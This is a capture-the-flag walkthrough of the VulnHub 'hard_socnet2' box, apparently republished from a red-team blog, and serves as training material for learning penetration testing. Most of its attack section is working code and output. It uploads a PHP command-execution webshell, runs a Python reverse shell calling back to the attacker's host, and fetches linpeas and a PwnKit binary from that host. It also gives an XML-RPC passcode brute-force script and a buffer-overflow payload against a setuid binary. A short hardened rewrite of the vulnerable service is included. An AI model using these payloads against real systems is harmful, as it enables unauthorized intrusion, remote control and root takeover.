Stay disciplined and be your best self: one box a day, and everyone is welcome to hold me to it.
1-Environment setup
Target VM download:
https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova
Kali image:
kali-linux-2024.2-virtualbox-amd64
Virtual machine environment:
Oracle VM VirtualBox 7.0
Network:
Both Kali and the target use the "Host-Only" network
Start Kali first, then the target. The previous box was assigned .104, so this one gets .105.
Kali's IP is 192.168.56.101
The target's IP is 192.168.56.105
2-Target walkthrough
2-1-Scanning and enumeration
Port scan; the command follows section 6.3 "Active Information Gathering" of the "OSCP | Information Gathering" chapter:
sudo nmap -p 1-65535 192.168.56.105
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 20:54 EDT
Nmap scan report for 192.168.56.105
Host is up (0.000079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
MAC Address: 08:00:27:1C:9D:15 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds
Ports 22, 80 and 8000 are open. Service enumeration, again following section 6.3 "Active Information Gathering" of the "OSCP | Information Gathering" chapter:
sudo nmap -p22,80,8000 -sT -A 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 20:55 EDT
Nmap scan report for 192.168.56.105
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:
2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)
256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)
256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Apache/2.4.29 (Ubuntu) :
http-cookie-flags:
/:
PHPSESSID:
httponly flag not set
Social Network :
8000/tcp open http BaseHTTPServer 0.3 (Python 2.7.15rc1)
BaseHTTP/0.3 Python/2.7.15rc1 :
Error response :
XMLRPC instance doesn't support introspection. :
MAC Address: 08:00:27:1C:9D:15 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 192.168.56.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.63 seconds
Port 22 is SSH, version OpenSSH 7.6p1; a search for exploitable vulnerabilities turned up nothing.
Ports 80 and 8000 are web services.
Directory brute-forcing found no usable vulnerability:
gobuster dir -u http://192.168.56.105 -w /usr/share/wordlists/dirb/common.txt -t 5
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.105
[+] Method:                  GET
[+] Threads:                 5
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 293]
/.htaccess (Status: 403) [Size: 298]
/.htpasswd (Status: 403) [Size: 298]
/database (Status: 301) [Size: 319] [--> http://192.168.56.105/database/]
/data (Status: 301) [Size: 315] [--> http://192.168.56.105/data/]
/functions (Status: 301) [Size: 320] [--> http://192.168.56.105/functions/]
/images (Status: 301) [Size: 317] [--> http://192.168.56.105/images/]
/includes (Status: 301) [Size: 319] [--> http://192.168.56.105/includes/]
/index.php (Status: 200) [Size: 10609]
/resources (Status: 301) [Size: 320] [--> http://192.168.56.105/resources/]
/server-status (Status: 403) [Size: 302]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Directory brute-forcing on port 8000 only returned errors; nothing useful to exploit there.
Visiting http://192.168.56.105 shows a login page and a registration page. Login requires an email address, and no email address is known, so I registered a new account and tried logging in with it:
POST / HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://192.168.56.105
Connection: close
Referer: http://192.168.56.105/
Cookie: PHPSESSID=44ppo456mnncv9os7rsv723mop
Upgrade-Insecure-Requests: 1
userfirstname=test&userlastname=test&usernickname=test&userpass=test1234&userpassconfirm=test1234&useremail=test%40test.com&selectday=1&selectmonth=1&selectyear=1996&usergender=M&userhometown=test&userstatus=S&userabout=test&register=Create+Account
2-2-Exploitation
After logging in, you can create posts and upload an avatar. I tried uploading a PHP webshell, and both places accept it. Below is the upload via a post:
POST /home.php HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------10620729983454150411412931893
Content-Length: 799
Origin: http://192.168.56.105
Connection: close
Referer: http://192.168.56.105/home.php
Cookie: PHPSESSID=44ppo456mnncv9os7rsv723mop
Upgrade-Insecure-Requests: 1
-----------------------------10620729983454150411412931893
Content-Disposition: form-data; name="caption"
test
-----------------------------10620729983454150411412931893
Content-Disposition: form-data; name="fileUpload"; filename="simple-backdoor.php"
Content-Type: application/x-php
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
-----------------------------10620729983454150411412931893
Content-Disposition: form-data; name="post"
Post
-----------------------------10620729983454150411412931893--
Run commands through the webshell:
curl http://192.168.56.105/data/images/posts/9.php?cmd=ls
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>4.png
5.png
6.png
9.php
</pre>
Generate a Python reverse-shell payload with revshells.com and run it through the webshell:
http://192.168.56.105/data/images/posts/9.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
Catch the reverse shell on Kali port 443:
nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 41786
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
pwd
/var/www/html/data/images/posts
ls /home
ls /home
socnet
cd /home/socnet
cd /home/socnet
ls
ls
add_record monitor.py peda
3-Privilege escalation
3-1-Privilege escalation enumeration
Upload and run linpeas.sh; the command follows section 17.1.3 "Automated Enumeration" of the "OSCP | Linux Privilege Escalation" chapter:
cd /tmp
wget http://192.168.56.101/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh
It flags [CVE-2021-4034] PwnKit, the same as on the previous box.
3-2-Privilege escalation exploitation
Here I used [CVE-2021-4034] PwnKit (https://github.com/ly4k/PwnKit):
wget http://192.168.56.101/PwnKit
chmod +x ./PwnKit
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
From the boxes of the past few days, one shortcut stands out: escalating with PwnKit works on essentially any Linux from before 2021. But boxes usually also plant other privilege-escalation paths, and this box's path is quite interesting. A brief description follows; anyone interested can try it themselves.
After getting the shell earlier, there is a socnet user directory under /home. Looking at its files:
$ ls
ls
add_record monitor.py peda
$ cat monitor.py
cat monitor.py
#my remote server management API
import SimpleXMLRPCServer
import subprocess
import random

debugging_pass = random.randint(1000,9999)

def runcmd(cmd):
    results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = results.stdout.read() + results.stderr.read()
    return output

def cpu():
    return runcmd("cat /proc/cpuinfo")

def mem():
    return runcmd("free -m")

def disk():
    return runcmd("df -h")

def net():
    return runcmd("ip a")

def secure_cmd(cmd,passcode):
    if passcode==debugging_pass:
        return runcmd(cmd)
    else:
        return "Wrong passcode."

server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
server.register_function(cpu)
server.register_function(mem)
server.register_function(disk)
server.register_function(net)
server.register_function(secure_cmd)
server.serve_forever()
$ ps aux |grep monitor.py
ps aux |grep monitor.py
socnet 754 0.0 0.0 4628 780 ? Ss 02:40 0:00 /bin/sh -c /usr/bin/python /home/socnet/monitor.py
socnet 770 0.0 1.3 43216 13508 ? S 02:40 0:01 /usr/bin/python /home/socnet/monitor.py
www-data 1791 0.0 0.1 11464 1040 pts/0 S+ 04:58 0:00 grep monitor.py
monitor.py can run system commands as the socnet user, but the passcode has to be brute-forced first; once a command goes through, you get a shell as socnet.
Python xmlrpc reference: https://docs.python.org/zh-cn/3/library/xmlrpc.html
import xmlrpc.client

payload = '''
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
'''

with xmlrpc.client.ServerProxy("http://192.168.56.105:8000/") as proxy:
    for i in range(1000,10000):
        res = str(proxy.secure_cmd(payload,i))
        if "Wrong" not in res:
            print(i)
            print(res)
            break
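The weakness above is monitor.py's own design: a four-digit passcode from random.randint(1000,9999) (only 9000 candidates, swept in one loop as the script shows), no failure counter or lockout, a caller-supplied command string run with shell=True, and a bind to 0.0.0.0. Below is a hardened rewrite of the same service, added here as an example (not code from the box or its author); it assumes Python 3 and a MONITOR_PASSCODE environment variable, both assumptions of this example.

```python
import hmac, os, subprocess, threading, time
from xmlrpc.server import SimpleXMLRPCServer

# Only fixed argv vectors are ever run: no shell=True, no caller-supplied command strings.
ALLOWED_COMMANDS = {
    "cpu": ["cat", "/proc/cpuinfo"],
    "mem": ["free", "-m"],
    "disk": ["df", "-h"],
    "net": ["ip", "a"],
}
MAX_FAILURES = 5        # wrong passcodes tolerated before lockout
LOCKOUT_SECONDS = 300   # a 9000-guess sweep now takes days instead of seconds
class PasscodeGuard:
    """Constant-time passcode check with a failure counter and a lockout window."""
    def __init__(self, secret):
        self.secret = secret.encode()
        self.failures = 0
        self.locked_until = 0.0
        self.lock = threading.Lock()

    def authorize(self, name, passcode, now=None):
        """Return 'locked', 'denied', 'unknown' or 'ok' for one request."""
        now = time.monotonic() if now is None else now
        with self.lock:
            if now < self.locked_until:
                return "locked"
            if not hmac.compare_digest(str(passcode).encode(), self.secret):
                self.failures += 1
                if self.failures >= MAX_FAILURES:
                    self.failures, self.locked_until = 0, now + LOCKOUT_SECONDS
                return "denied"
            self.failures = 0
            return "ok" if name in ALLOWED_COMMANDS else "unknown"

def make_secure_cmd(guard):
    """RPC handler: takes a command *name* from the allowlist, never a shell string."""
    def secure_cmd(name, passcode):
        verdict = guard.authorize(name, passcode)
        if verdict != "ok":
            return "Request refused: %s." % verdict
        out = subprocess.run(ALLOWED_COMMANDS[name], capture_output=True, text=True)
        return out.stdout + out.stderr
    return secure_cmd

if __name__ == "__main__":
    # Secret comes from the environment (assumed variable name), not random.randint(1000, 9999).
    guard = PasscodeGuard(os.environ["MONITOR_PASSCODE"])
    server = SimpleXMLRPCServer(("127.0.0.1", 8000))   # loopback only, no introspection
    server.register_function(make_secure_cmd(guard), "secure_cmd")
    server.serve_forever()
```

With this in place the loop from the script above returns "Request refused: denied." five times and then "Request refused: locked." for the rest of the window, and even a correct passcode can only name one of the four fixed commands.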
But this is of limited use: add_record can be run without socnet privileges anyway. Debugging with gdb shows that add_record has a buffer overflow and is setuid/setgid, so getting add_record to execute commands yields root.
$ file ./add_record
file ./add_record
./add_record: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e3fa9a66b0b1e3281ae09b3fb1b7b82ff17972d8, not stripped
$
Having located the buffer overflow with gdb, build the payload and feed it to add_record as input to get a root shell:
python -c "import struct; print('aan1n1n1n' + 'A'*62 + struct.pack('I', 0x08048676))" > /tmp/rootshell
cat /tmp/rootshell - | ./add_record
In summary, the privilege escalation is somewhat difficult, but it is outside the OSCP syllabus; readers can experiment with it on their own.
There are many ways to attack a box; try more and share more.
Recommendations of good boxes are welcome via the account's message backend,
or send me your own box notes and I will share them.
Stay disciplined and be your best self.
Originally published on the WeChat public account 高级红队专家 (Senior Red Team Expert): OSCP实战靶机 | hard_socnet2